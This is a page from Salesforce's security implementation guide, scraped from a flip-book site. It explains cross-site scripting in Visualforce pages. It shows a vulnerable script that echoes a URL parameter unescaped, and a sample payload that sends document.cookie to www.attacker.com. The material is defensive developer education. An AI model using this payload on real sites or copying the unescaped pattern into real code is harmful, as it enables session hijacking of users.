salesforce_security_impl_guide
salesforce_security_impl_guide
salesforce_security_impl_guide
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
CHAPTER 6<br />
Security Tips for Apex and Visualforce<br />
Development<br />
Understanding Security<br />
EDITIONS<br />
The powerful combination of Apex and Visualforce pages allow Force.com developers to provide<br />
custom functionality and business logic to Salesforce or create a completely new stand-alone<br />
product running inside the Force.com platform. However, as with any programming language,<br />
developers must be cognizant of potential <strong>security</strong>-related pitfalls.<br />
Salesforce.com has incorporated several <strong>security</strong> defenses into the Force.com platform itself.<br />
However, careless developers can still bypass the built-in defenses in many cases and expose their<br />
applications and customers to <strong>security</strong> risks. Many of the coding mistakes a developer can make<br />
on the Force.com platform are similar to general Web application <strong>security</strong> vulnerabilities, while<br />
others are unique to Apex.<br />
Available in: Group,<br />
Professional, Enterprise,<br />
Performance, Unlimited,<br />
Developer, and<br />
Database.com Editions<br />
Visualforce is not available<br />
in Database.com.<br />
To certify an application for AppExchange, it is important that developers learn and understand the <strong>security</strong> flaws described here. For<br />
additional information, see the Force.com Security Resources page on Salesforce Developers at<br />
https://developer.<strong>salesforce</strong>.com/page/Security.<br />
Cross-Site Scripting (XSS)<br />
Cross-site scripting (XSS) attacks cover a broad range of attacks where malicious HTML or client-side scripting is provided to a Web<br />
application. The Web application includes malicious scripting in a response to a user of the Web application. The user then unknowingly<br />
becomes the victim of the attack. The attacker has used the Web application as an intermediary in the attack, taking advantage of the<br />
victim's trust for the Web application. Most applications that display dynamic Web pages without properly validating the data are likely<br />
to be vulnerable. Attacks against the website are especially easy if input from one user is intended to be displayed to another user. Some<br />
obvious possibilities include bulletin board or user comment-style websites, news, or email archives.<br />
For example, assume the following script is included in a Force.com page using a script component, an on* event, or a Visualforce<br />
page.<br />
var foo = '{!$CurrentPage.parameters.userparam}';script>var foo =<br />
'{!$CurrentPage.parameters.userparam}';<br />
This script block inserts the value of the user-supplied userparam onto the page. The attacker can then enter the following value for<br />
userparam :<br />
1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi'%2Bdocument.cookie;var%20foo='2<br />
In this case, all of the cookies for the current page are sent to www.attacker.com as the query string in the request to the<br />
cookie.cgi script. At this point, the attacker has the victim's session cookie and can connect to the Web application as if they were<br />
the victim.<br />
The attacker can post a malicious script using a Website or email. Web application users not only see the attacker's input, but their<br />
browser can execute the attacker's script in a trusted context. With this ability, the attacker can perform a wide variety of attacks against<br />
the victim. These range from s<strong>impl</strong>e actions, such as opening and closing windows, to more malicious attacks, such as stealing data or<br />
session cookies, allowing an attacker full access to the victim's session.<br />
For more information on this attack in general, see the following articles:<br />
100